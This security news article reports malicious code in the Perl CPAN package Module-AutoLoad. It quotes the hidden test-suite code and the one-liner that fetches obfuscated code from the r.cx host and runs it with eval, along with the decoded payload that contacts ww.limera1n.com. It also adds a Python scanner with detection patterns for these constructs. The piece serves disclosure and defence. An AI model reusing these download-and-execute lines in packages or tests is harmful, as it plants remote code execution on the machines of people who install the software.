Malicious code found in the Module-AutoLoad Perl package

Malicious code has been identified in Module-AutoLoad, a Perl package distributed through the CPAN catalogue and designed to load CPAN modules automatically on the fly. The malicious insert was found in the test code 05_rcx.t, which has been shipped since 2011.
It is worth noting that questions about the download of suspicious code came up on Stackoverflow back in 2016.

The malicious activity comes down to an attempt to download and execute code from a third-party server (http://r.cx:1/) while the test suite that is launched during installation of the module is running. It is assumed that the code originally downloaded from the external server was not malicious, but the request is now redirected to the domain ww.limera1n.com, which serves its own portion of code for execution.

To set up the download, the file 05_rcx.t uses the following code:

my $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
my $try = `$^X $prog`;

This code causes the script ../contrib/RCX.pl to be executed, the contents of which come down to the line:

use lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1"};

This script downloads code, obfuscated with the perlobfuscator.com service, from the external host r.cx (the character codes 82.46.99.88 correspond to the text "R.cX") and executes it in an eval block.

$ perl -MIO::Socket -e'$b= new IO::Socket::INET 82.46.99.88.":1"; print <$b>;'
eval unpack u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}

After unpacking, the following code is ultimately executed:

print{$b=new IO::Socket::INET"ww.limera1n.com:80"}"GET /iJailBreak
";evalor return warn$@while$b;1
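The constructs in the snippets above can be flagged when auditing an unpacked distribution before its tests run. The following is an added example, not code from the original article or from the module: the rule names, the `scan` and `decode_vstring` helpers and the benign `t/00_load.t` file are assumptions made for illustration, and the other two sample files are the lines quoted above.

```python
import re

# Constructed sample distribution: the two snippets quoted above plus a
# benign test file (hypothetical contents), keyed by path.
SAMPLE_DIST = {
    "t/05_rcx.t": r'''my $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
my $try = `$^X $prog`;
''',
    "contrib/RCX.pl": r'''use lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1"};
''',
    "t/00_load.t": 'use Test::More tests => 1;\nuse_ok("Some::Module");\n',
}

# Heuristic rules; the names are this example's own, not from any scanner.
RULES = {
    "runs-perl-via-backticks": re.compile(r"`[^`\n]*\$\^X[^`\n]*`"),
    "eval-of-filehandle-read": re.compile(r"\beval\s*<\$\w+>"),
    "raw-socket": re.compile(r"\bIO::Socket::INET\b"),
    "eval-of-uudecoded-data": re.compile(r"\beval\s+unpack\s+u\s*=>"),
}
# Perl treats a bare literal with two or more dots as a v-string.
VSTRING = re.compile(r"(?<![\w.])\d{1,3}(?:\.\d{1,3}){2,}(?!\.?\d)")


def decode_vstring(literal):
    """Return the string Perl builds from a v-string: one character per number."""
    return "".join(chr(int(n)) for n in literal.split("."))


def scan(files):
    """Return (path, finding) pairs, ordered by path, for a {path: source} mapping."""
    findings = []
    for path, text in sorted(files.items()):
        for name, rx in RULES.items():
            if rx.search(text):
                findings.append((path, name))
        for m in VSTRING.finditer(text):
            decoded = decode_vstring(m.group(0))
            # Version numbers and IP addresses rarely decode to printable ASCII.
            if all(32 <= ord(c) < 127 for c in decoded):
                findings.append((path, "vstring:" + decoded))
    return findings


if __name__ == "__main__":
    for path, finding in scan(SAMPLE_DIST):
        print(f"{path}: {finding}")
```

A hit is a prompt for manual review, not a verdict: legitimate test suites also spawn the interpreter with `$^X`, so the combination of findings across a test file and the script it launches is what matters.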

The problematic package has now been removed from the PAUSE repository (Perl Authors Upload Server), and the module author's account has been blocked. At the same time, the module is still available in the MetaCPAN archive and can be installed directly from MetaCPAN with some utilities, such as cpanminus. It is noted that the package was not widely distributed.

Interestingly, the module's author joined the discussion. He denied the claim that the malicious code was inserted after his site "r.cx" was hacked, and explained that he was simply having fun and had used perlobfuscator.com not to hide anything, but to reduce the size of the code and make it easier to copy via the clipboard. The choice of the function name "botstrap" is explained by the fact that the word "sounds like bot and is shorter than bootstrap." The module's author also gave assurances that the manipulations identified do not perform malicious actions, but only demonstrate downloading and executing code over TCP.

Source: opennet.ru
